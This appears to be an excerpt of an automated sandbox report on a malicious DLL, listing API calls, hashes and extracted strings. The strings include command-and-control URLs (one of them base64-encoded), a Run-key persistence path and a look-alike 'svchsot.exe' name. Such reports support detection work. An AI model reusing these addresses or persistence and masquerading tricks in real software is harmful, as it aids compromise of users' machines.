                                                                                                                                            • Opcode Fuzzy Hash: 3b97f3ef57c6d34437c21e844b3cc3d0ae84d0d31088cb251ee543bf93b7c76e
                                                                                                                                            • Instruction Fuzzy Hash: 9701F2A4844228BAF211F3704CCADBF395DDB563D4F200528F915A908BDB24EC0145B3
                                                                                                                                            Function 10008567 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 79sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00002710), ref: 1000857E
                                                                                                                                            • Sleep.KERNEL32(001B7740,?,00000000,80000002,00000000,00000000,000F003F,?), ref: 100085BF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$wINsTA0\dEFauLT
                                                                                                                                            • API String ID: 3472027048-3516831565
                                                                                                                                            • Opcode ID: 97b5d75c4eae03a1f54d307b40641d8b725bb66f95620e0adc97901586be56a8
                                                                                                                                            • Instruction ID: 69b21accf233d090089117fd856bc82e5cd65d02c06b2ff4ec7ccf08b8a7457c
                                                                                                                                            • Opcode Fuzzy Hash: 97b5d75c4eae03a1f54d307b40641d8b725bb66f95620e0adc97901586be56a8
                                                                                                                                            • Instruction Fuzzy Hash: 6421817680525CBAEB11EBE4CC46EDFBB7CEF08390F1400A9F604BB151DB765A458B91
                                                                                                                                            Function 100044AD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,00000000,GetExtendedUdpTable,?,iphlpapi.dll), ref: 100044E9
                                                                                                                                            • GetExtendedUdpTable.IPHLPAPI(?,?,00000001,00000002,00000001,00000000,?,00000000,GetExtendedUdpTable,?,iphlpapi.dll), ref: 10004513
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExtendedTable
                                                                                                                                            • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                                                                                                            • API String ID: 2407854163-1809394930
                                                                                                                                            • Opcode ID: 8f3a0eb883154a3195ca5da507f2da972492a258440e1d6e2132d319b0eaf8e7
                                                                                                                                            • Instruction ID: 6449560a486cb6172ee975f2d37c1f40bf8993c7a1880d61e14318031523e361
                                                                                                                                            • Opcode Fuzzy Hash: 8f3a0eb883154a3195ca5da507f2da972492a258440e1d6e2132d319b0eaf8e7
                                                                                                                                            • Instruction Fuzzy Hash: D1215CB5500508BFEB20DB69DC46EAF77BCDF813D1F214519F9119A086DE30AE808674
                                                                                                                                            Function 1000841C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 119sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(?,00000800,?,?,?,svchsot.exe,?,?,?,?,00000000,?,?,?), ref: 1000855C
                                                                                                                                            Strings
                                                                                                                                            • U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 1000846F
                                                                                                                                            • svchsot.exe, xrefs: 10008524
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$svchsot.exe
                                                                                                                                            • API String ID: 3472027048-2214221337
                                                                                                                                            • Opcode ID: d2131fb9256a9d085b7213a385e4fb7e2e0d0505dace0aeb26e32ec0842a8d4a
                                                                                                                                            • Instruction ID: e8defaa02cb337ec462540d7064ad22b690c993f3d196736069eab589a90189d
                                                                                                                                            • Opcode Fuzzy Hash: d2131fb9256a9d085b7213a385e4fb7e2e0d0505dace0aeb26e32ec0842a8d4a
                                                                                                                                            • Instruction Fuzzy Hash: EE314D7290015DBEEB01DBA4CD81DEFB7FDFB48284F1440A6F644E6105EA30AF858BA1
                                                                                                                                            Function 100087B6 Relevance: 6.0, APIs: 4, Instructions: 27sleepthreadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 490 100087b6-100087ea CreateThread Sleep CreateThread Sleep 492 100087eb-100087f2 490->492
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(?,?,Function_00006A6E), ref: 100087D1
                                                                                                                                            • Sleep.KERNEL32(00001388,?,?,Function_00006A6E), ref: 100087D8
                                                                                                                                            • CreateThread.KERNEL32(?,?,Function_0000841C,?,?,?,?,?,Function_00006A6E), ref: 100087E4
                                                                                                                                            • Sleep.KERNEL32(000000FF,?,?,Function_0000841C,?,?,?,?,?,Function_00006A6E), ref: 100087E8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateSleepThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4202482776-0
                                                                                                                                            • Opcode ID: 7611a2c7549d694aa888d6d647670ac1460baf17db733e16608d155f4bf44ca4
                                                                                                                                            • Instruction ID: 2df9746d7e78e8372c6e87ac4aa0691d1060a96339f5c4ce5d4c7b8b7a8da0f8
                                                                                                                                            • Opcode Fuzzy Hash: 7611a2c7549d694aa888d6d647670ac1460baf17db733e16608d155f4bf44ca4
                                                                                                                                            • Instruction Fuzzy Hash: 46E05EE024435DBDF321B2791CC8DFF1E0DEB812FCB254252F528100CB6A540D048AB2
                                                                                                                                            Function 10006B1F Relevance: 4.6, APIs: 3, Instructions: 122sleepthreadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 494 10006b1f-10006b5f call 1002005c call 10003ece GetLastError 499 10006b90-10006bc0 call 1002a5e7 call 10038e15 494->499 500 10006b61-10006b8e CreateThread call 1002420a call 1002ab9b Sleep 494->500 510 10006bc2-10006bc5 499->510 511 10006bca-10006bcf 499->511 512 10006c66-10006c68 510->512 513 10006bd5-10006bd6 511->513 514 10006c56-10006c65 call 1000ccf2 511->514 515 10006bd9-10006be3 513->515 514->512 518 10006be5-10006be9 515->518 519 10006beb-10006bf1 515->519 518->519 520 10006bf3-10006bf7 519->520 521 10006bf9-10006c3a 519->521 520->521 522 10006c40-10006c45 521->522 523 10006c3c 521->523 524 10006c47 522->524 525 10006c4b-10006c50 522->525 523->522 524->525 525->515 526 10006c52-10006c55 525->526 526->514
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B50,?,?,?,00000202,?), ref: 10003EDA
                                                                                                                                            • GetLastError.KERNEL32 ref: 10006B55
                                                                                                                                            • CreateThread.KERNEL32(?,?,1000687E), ref: 10006B6B
                                                                                                                                            • Sleep.KERNEL32(00002710,?,00000000,00000000,000000FF,?,?,1000687E), ref: 10006B88
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$ErrorLastMutexSleepThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 145085098-0
                                                                                                                                            • Opcode ID: 9fdb200d5929ef7e8f6a96f443088d0c96ecfb43422a1e838647d38a76ea70c1
                                                                                                                                            • Instruction ID: 4f35827bfa7b5ea93410d600da94e256639eda4c8ceaa52b9f8b13dee9a51c26
                                                                                                                                            • Opcode Fuzzy Hash: 9fdb200d5929ef7e8f6a96f443088d0c96ecfb43422a1e838647d38a76ea70c1
                                                                                                                                            • Instruction Fuzzy Hash: 463182714043905EF716DB284C45EA7BFAEDF5A390B14416AF8A5CB287D620D941C771
                                                                                                                                            Function 10007101 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 527 10007101-10007119 call 1000cc9e 530 1000711b-10007160 call 10005c4c 527->530 533 10007162-10007169 530->533 534 1000716b 530->534 535 10007170-100071a4 call 10003ef4 call 1000ccec call 100061bd 533->535 534->535 542 100071a6-100071b2 Sleep 535->542 543 100071b7-100071bb 535->543 542->530 544 100071d9-100071e3 call 1000ccf2 543->544 545 100071bd-100071c7 543->545 544->542 551 100071e5-100071f5 call 1000cde2 544->551 546 100071c9-100071cd 545->546 547 100071cf 545->547 549 100071d3-100071d7 546->549 547->549 549->544 549->545 551->542 554 100071f7-1000720c wsprintfA call 1000570f 551->554 554->542
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • http://107.160.131.254:23588/article.php, xrefs: 1000716B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleepwsprintf
                                                                                                                                            • String ID: http://107.160.131.254:23588/article.php
                                                                                                                                            • API String ID: 1749205058-3833642815
                                                                                                                                            • Opcode ID: 97092958d065cc5244b5ac70b0ba84f38b29928c2b3a7baf181ba609d4b8ef37
                                                                                                                                            • Instruction ID: aabc6cc0ccec88c78b37051fa20fdae4f9ca8aa4d7268392f08ad21868547801
                                                                                                                                            • Opcode Fuzzy Hash: 97092958d065cc5244b5ac70b0ba84f38b29928c2b3a7baf181ba609d4b8ef37
                                                                                                                                            • Instruction Fuzzy Hash: 462129B6D046557AF724D368CC56FCF37ACEF053D0F2000A6F608A50C6E679AE818A11
                                                                                                                                            Function 100061BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10006201
                                                                                                                                            Strings
                                                                                                                                            • TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1, xrefs: 100061D0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FormatInternetOpenTime___crt
                                                                                                                                            • String ID: TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1
                                                                                                                                            • API String ID: 483802873-1756078650
                                                                                                                                            • Opcode ID: 958d10e8dd0a11b106b86c41bd1f14c2109df9aed52d4faf27bdb7eed6aa23fd
                                                                                                                                            • Instruction ID: f0c3526304c825564c5c4eb44b26f53dc373e74deb03e814873fed5b313e77ee
                                                                                                                                            • Opcode Fuzzy Hash: 958d10e8dd0a11b106b86c41bd1f14c2109df9aed52d4faf27bdb7eed6aa23fd
                                                                                                                                            • Instruction Fuzzy Hash: 1C21C575D0014DBAEF21DB55DC45D9F7B7DDB852D0F20807AF608E6045DA319A818660
                                                                                                                                            Function 10006290 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 100062BF
                                                                                                                                              • Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,00000000,00000000,10006206), ref: 10003F39
                                                                                                                                            Strings
                                                                                                                                            • TW96aWxsYS80LjAgKGNvbXBhdGlibGUp, xrefs: 10006298
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InternetOpen$FormatTime___crt
                                                                                                                                            • String ID: TW96aWxsYS80LjAgKGNvbXBhdGlibGUp
                                                                                                                                            • API String ID: 1165476586-1918919809
                                                                                                                                            • Opcode ID: 6dd616fe18b4dc7dc232f498d1d56e002bf1131066ec89318103dde342ec69ca
                                                                                                                                            • Instruction ID: e1df23a7d6fc88136f19512af0817ca3ec1a39d4f872029b50130054e15d899c
                                                                                                                                            • Opcode Fuzzy Hash: 6dd616fe18b4dc7dc232f498d1d56e002bf1131066ec89318103dde342ec69ca
                                                                                                                                            • Instruction Fuzzy Hash: 61E0D832D089D238BA33E1671C0ED9F1EBDCBC7AF0B71402DF9489100EE8556485C0B5
                                                                                                                                            Function 100081F7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: C:\Program Files
                                                                                                                                            • API String ID: 3472027048-1387799010
                                                                                                                                            • Opcode ID: ef70be951d54eb09da497d03d6b876b815efcf974a7af6f3814c100205ad0eea
                                                                                                                                            • Instruction ID: c9703108929f2dc2805788eab40c91aa3f5a92b87bc929f4f41ff718cce9746c
                                                                                                                                            • Opcode Fuzzy Hash: ef70be951d54eb09da497d03d6b876b815efcf974a7af6f3814c100205ad0eea
                                                                                                                                            • Instruction Fuzzy Hash: 40F0723A905AA1A6F701DFA409C068B776DFF022A0B210026F840BF047C7B18E0243E2
                                                                                                                                            Function 1000406C Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D60,?,10006D60,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: 8241c048834319a8777681939fd791c1f2bb79611796acde0cc24ef85fc7be79
                                                                                                                                            • Instruction ID: 2e24eff2bcdac0d7bb79d22e3b0edd8e416dbe054c2d5b18b585679418e55d12
                                                                                                                                            • Opcode Fuzzy Hash: 8241c048834319a8777681939fd791c1f2bb79611796acde0cc24ef85fc7be79
                                                                                                                                            • Instruction Fuzzy Hash: 8DD0AE3200014EFBCF025F81ED05CDA3F6AFB0C2A9B068254FA1825030C777D9B1AB91
                                                                                                                                            Function 100040BA Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 100040CC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            • Opcode ID: a195baf415497c3f6e756206114371a6254dc762b0ba02df47c96a08b610d07e
                                                                                                                                            • Instruction ID: 17287b262fc42a8ef4c3757039caf17c8ec33028492a73a8645d3109de99ba33
                                                                                                                                            • Opcode Fuzzy Hash: a195baf415497c3f6e756206114371a6254dc762b0ba02df47c96a08b610d07e
                                                                                                                                            • Instruction Fuzzy Hash: 40C0013200420EFBCF025F81EC058DA3F2AFB082A1B008010FE1804030C773D9B1EBA1
                                                                                                                                            Function 10003F0A Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InternetOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2038078732-0
                                                                                                                                            • Opcode ID: 8fdbf6ddd27a1d6b462f044f687e1b09091a90aa3cf3341bbc8376c5064c6b07
                                                                                                                                            • Instruction ID: b95a3e5d4d1581b579a43ffb785aa3053a804adf9b6b5080047aec5b24f95343
                                                                                                                                            • Opcode Fuzzy Hash: 8fdbf6ddd27a1d6b462f044f687e1b09091a90aa3cf3341bbc8376c5064c6b07
                                                                                                                                            • Instruction Fuzzy Hash: 32C0013200020EFBCF025F81EC058DA7F2AFB092A0B008010FA1804031C733D971AB95
                                                                                                                                            Function 10003ECE Relevance: 1.5, APIs: 1, Instructions: 5synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(?,?,?,10006B50,?,?,?,00000202,?), ref: 10003EDA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
